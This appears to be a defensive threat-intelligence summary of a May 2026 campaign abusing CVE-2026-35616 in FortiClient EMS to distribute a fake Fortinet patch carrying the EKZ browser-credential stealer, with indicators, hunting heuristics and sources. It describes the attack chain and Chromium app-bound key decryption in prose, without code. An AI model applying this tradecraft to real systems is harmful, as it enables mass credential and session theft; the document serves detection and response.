FortiClient EMS CVE-2026-35616 EKZ Infostealer campaign

Summary

Arctic Wolf reports May 2026 intrusions where an unattributed threat cluster exploited CVE-2026-35616 in FortiClient Endpoint Management Server (EMS) to push a fake Fortinet endpoint patch to managed devices. The payload, named EKZ Infostealer by Arctic Wolf, harvests browser credentials, cookies, and autofill data from Chromium- and Gecko-family browsers.

The durable tradecraft is management-plane weaponization: once attackers bypass FortiClient EMS API authentication, they can modify EMS-managed configuration and use trusted endpoint-management workflows to execute PowerShell on many managed endpoints without separately compromising each host.

Why this matters

FortiClient EMS is a centralized endpoint-management path. A single exposed vulnerable EMS server can become a distribution mechanism for malware across the endpoints it manages.
The malware is disguised as a Fortinet patch (FortiEndpoint_Patch.exe), making the activity blend with legitimate endpoint-update expectations.
EKZ Infostealer targets high-value browser artifacts, including credentials, cookies, and autofill data. Stolen session cookies and saved passwords can outlive cleanup of the initial EMS compromise.
The chain uses FortiClient-managed VPN / remote-access scripting and FortiClient components to launch commands, so normal allowlists or parent-process assumptions may miss it.
Fortinet confirmed exploitation in the wild for CVE-2026-35616 and advised affected FortiClient EMS 7.4.5 / 7.4.6 customers to apply hotfixes or upgrade to 7.4.7 or later.

Reported tradecraft

Attackers exploit CVE-2026-35616, an improper-access-control flaw that lets unauthenticated requests reach privileged FortiClient EMS API actions.
The actor modifies EMS configuration, including deferring firmware-upgrade reminders and changing Remote Access Profile / endpoint policy configuration.
The modified policy inserts a malicious script that runs on managed endpoints through FortiClient's normal management pathway.
FortiClient's legitimate fortitray.exe launches cmd.exe, which executes a .cmd file containing Base64-encoded PowerShell.
The PowerShell downloads p.exe / FortiEndpoint_Patch.exe from 83.138.53[.]110, runs the credential stealer, periodically posts harvested results back to the same infrastructure, then removes local artifacts.
EKZ Infostealer stages browser data into log.txt under ProgramData; the stealer itself lacks direct network exfiltration, so the surrounding PowerShell handles outbound delivery.
For Chromium-family browsers, EKZ copies itself into the browser Application\ directory and relaunches from there to satisfy Chromium Elevation Service path validation before calling IElevator::DecryptData against os_crypt.app_bound_encrypted_key material.
The tool iterates browser profiles and decrypts SQLite databases for credentials, cookies, and autofill data; Arctic Wolf notes CLI verbs such as action_list, view, label, and export, suggesting repeated operator-driven use across hosts.

Notable indicators and pivots

Vulnerability: CVE-2026-35616; Fortinet PSIRT FG-IR-26-099.
Affected FortiClient EMS line: 7.4.5 through 7.4.6; FortiClient EMS 7.2 not affected per Fortinet.
Fake patch / stealer names: FortiEndpoint_Patch.exe, remote p.exe.
Infrastructure observed by Arctic Wolf: 83.138.53[.]110/dl/p.exe and HTTP POST exfiltration to 83.138.53[.]110.
Main payload SHA-256: 0da123adf9251957a4b850a3f6bd6a753dd4892be176a84a18450e899534cc5e.
Additional files hosted on the same server included FortiEndpoint_Patch.2.4.9.zip, FortiEndpoint_Patch.2.4.9.msi, fil_api_ms_win_crt_apibase_l1_1_0.dll, and Microsoftr Windowsr Operating System-Installer.exe.
Local artifact pattern: ProgramData\log.txt containing staged credential output before PowerShell exfiltration.
Process lineage to review: fortitray.exe → cmd.exe → PowerShell → fake Fortinet patch executable.

Defender heuristics

Patch or hotfix FortiClient EMS 7.4.5 / 7.4.6 immediately; upgrade to FortiClient EMS 7.4.7 or later where possible.
Treat any vulnerable internet-exposed EMS server as potentially compromised until logs, configuration history, and managed-endpoint telemetry are reviewed.
Audit FortiClient EMS Remote Access Profile and endpoint policy changes around the exposure window, especially scripts, VPN tunnel scripts, firmware-reminder settings, and unexpected PowerShell command material.
Hunt managed endpoints for fortitray.exe spawning cmd.exe or PowerShell, downloads from raw IP infrastructure, FortiEndpoint_Patch.exe, p.exe, or ProgramData\log.txt creation.
Search proxy, EDR, and firewall telemetry for 83.138.53[.]110; preserve packet metadata and HTTP POST timing if present.
After confirmed execution, rotate browser-saved credentials, invalidate web sessions, review MFA prompts and impossible-travel events, and reset secrets used from affected endpoints.
Preserve EMS server logs, endpoint policy exports, PowerShell script-block logs, process trees, downloaded binaries, browser profile artifacts, and FortiClient logs before removing malware or reimaging.

Attribution notes

Arctic Wolf describes the activity as a threat cluster and does not name a specific actor. Track this as an unattributed FortiClient EMS exploitation and endpoint-management abuse campaign unless future primary reporting links EKZ Infostealer or the infrastructure to a stable actor.

Sources

Arctic Wolf Labs: https://arcticwolf.com/resources/blog/forticlient-ems-exploited-via-cve-2026-35616-to-deliver-ekz-infostealer-disguised-as-a-fortinet-patch/
Arctic Wolf Labs IOC repository: https://github.com/rtkwlf/wolf-tools/tree/main/threat-intelligence/unattributed-fake-forticlient-update-cve-2026-35616
Fortinet PSIRT FG-IR-26-099: https://fortiguard.fortinet.com/psirt/FG-IR-26-099
The Hacker News summary: https://thehackernews.com/2026/05/threat-actors-exploit-critical.html